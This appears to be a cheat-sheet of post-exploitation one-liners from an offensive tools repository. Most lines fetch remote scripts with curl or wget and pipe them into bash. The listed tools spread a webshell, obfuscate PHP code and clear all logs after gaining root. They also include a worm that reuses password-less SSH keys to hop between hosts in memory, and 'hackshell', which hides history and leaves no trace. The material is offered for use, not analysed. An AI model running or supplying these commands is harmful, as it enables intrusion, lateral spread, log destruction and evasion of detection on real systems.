netstat if there is no netstat/ss/lsof:
curl -fsSL https://raw.githubusercontent.com/oxygencall/tools/master/awk_netstat.sh | bashShow all domains hosted on a server + system-information :
curl -fsSL https://raw.githubusercontent.com/oxygencall/tools/master/what_server.sh | bashSpreading your webshell to the deepest destination folder
wget https://raw.githubusercontent.com/oxygencall/tools/master/dorEncrypt ur PHP Code
php ob.phpClear all logs if gain root
wget https://raw.githubusercontent.com/oxygencall/tools/master/clear.shThe Berserker looks for password-less ssh-keys (such as ~/.ssh/id_rsa) and then attempts to log in to as many hosts as possible. It repeats its action recursively. All this without writing or installing any data on any host. It’s an in-memory infiltration only.
export BS="$(curl -fsSL https://raw.githubusercontent.com/oxygencall/tools/master/bs)" && bash -c "BS_DEPTH=1 $BS"
# hackshell
Make BASH stealthy and hacker friendly with lots of bash functions
Usage:
```shell
source <(curl -SsfL https://thc.org/hs) source <(curl -SsfL https://github.com/hackerschoice/hackshell/raw/main/hackshell.sh)Some features:
- unsets HISTFILE, SSH_CONNECT, wget/redis/mysql/less-HISTORY, ...
- Upgrates to PTY shell (if reverse shell)
- Creates hacker-friendly shortcuts, bash-functions and aliases
- Static binary download by simple
bin <command>(e.g.bin nmap) - Does not write ANY data to the harddrive
- Leaves no trace
